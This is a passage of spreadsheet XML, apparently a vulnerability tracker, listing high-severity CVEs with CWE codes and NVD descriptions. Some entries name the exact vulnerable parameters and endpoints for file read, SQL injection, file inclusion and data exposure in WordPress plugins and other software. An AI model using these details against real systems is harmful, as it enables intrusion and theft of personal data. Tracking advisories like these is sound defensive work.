      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>An identity-verification weakness in Kiteworks Email Protection Gateway allowed the gateway to act on the Kiteworks platform on behalf of a user it had not authenticated, and to provision a platform account for an identity it did not already know. A remote, unauthenticated sender could potentially exploit this to obtain control of a platform account.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102128</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102143</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-434</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated attacker could cause a file with attacker-controlled content to be written to the appliance filesystem through an administrative upload handler that did not properly authenticate the request. This did not by itself result in code execution, which would require a separate vulnerability to place the file in an executable location.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102143</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102717</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-457</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>MQTT WebSocket setter ABI mismatch may disclose memory or cause a crash</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102717</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103472</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>restbed through 5.0.0 accepts WebSocket frames with declared payload lengths up to 2^63 bytes and buffers the payload without size limits in an unbounded stream buffer. Remote unauthenticated attackers can declare large frame sizes and stream payload data to exhaust server memory, causing denial of service through process crash.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103472</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103591</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>DeepWiki-Open through commit d92819a contains an unauthenticated arbitrary file read vulnerability in the GET /codemap/file endpoint via the repo_url parameter. Attackers can supply a non-URL repo_url value to bypass path containment checks and read any file accessible to the API process by specifying absolute file paths.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103591</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6806</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>The Motors – Car Dealership &amp; Classified Listings Plugin plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'stm_lat/stm_lng' parameter in all versions up to, and including, 1.4.109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T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6806</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75098</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>The Product Designer App plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.1.3 via the 'svg' parameter parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. The endpoint's only authentication gate relies on a nonce and token that are both publicly emitted as JavaScript globals on any page rendering the [pdapp-studio-page] shortcode, making them freely obtainable by anonymous visitors.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75098</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76145</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>An improper privilege management vulnerability in Genian SSL PNS allows an attacker to escalate to super administrator privileges and force the creation of an OS account by manipulating the permission column during CSV bulk user registration</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76145</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80276</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>db4dfee8-a97e-4877-bfae-eba6d14a2166</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Comelit Multi-User Gateway for VIP System (model 1456B) firmware versions 2.9.1 and 2.10.0 expose a network-accessible management interface that does not require authentication. Through this interface, sensitive device configuration data - including the Remote Configuration Password - can be read in cleartext by a remote, unauthenticated attacker.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80276</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85532</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Apache WSS4J accepted attacker-controlled derived-key lengths and offsets without adequate bounds. This could permit cryptographically weak keys or excessive CPU and memory consumption when processing crafted WS-Security messages. The fixes enforce a minimum key length of 16 bytes, a maximum length of 512 bytes, and a maximum offset of 4096 bytes.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85532</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89294</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.12.27 via the 'ssa_locale'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Notably, exploitation does not require authentication in practice, as the locale filter is installed unconditionally on every request during plugins_loaded and the callback performs no nonce or capability check before returning the raw GET parameter value.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89294</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92121</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>In the WSS4J streaming (StAX) code, a signature reference using the WS-Security STR-Transform leaves an internal "inside signed content" flag permanently set. The WS-SecurityPolicy enforcer uses that flag to decide whether an element needs checking, so it stops evaluating SignedParts and SignedElements for the rest of the message. A policy requiring the SOAP Body to be signed is then satisfied even when the Body carries no signature, removing the protection against XML Signature Wrapping. Signature verification itself is unaffected. The DOM code is not affected. 
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4 which fix this issue.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92121</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92245</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.12.32 via the 'recursive' parameter. This makes it possible for unauthenticated attackers to extract customer PII — including names, email addresses, phone numbers, and custom form field data — stored in appointment records, as well as per-appointment public_token values. The leaked per-appointment public_token values also enable unauthenticated attackers to delete arbitrary appointments via the DELETE /wp-json/ssa/v1/appointments/{id} endpoint, which accepts the token as sole authorization.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92245</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94002</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>Possible memory exhaustion in SFTP clients (DefaultSftpClient) in component sshd-sftp in Apache MINA SSHD versions 0.9.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5.
Apache 
MINA SSHD is a Java library for client-side and server-side SSH. The sshd-sftp component provides support for SFTP.
The SFTP client implementation, when receiving a reply, did not check that this reply corresponded to a request sent earlier. Unsolicited replies would be stored but never consumed. A malicious server could keep sending unsolicited replies until available memory in the client was exhausted.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94002</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94120</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in GravityExport Lite for Gravity Forms &lt;= 2.7.2 versions.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94120</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94123</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Arbitrary File Download in NextGEN Gallery &lt;= 4.5.0 versions.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94123</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94178</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
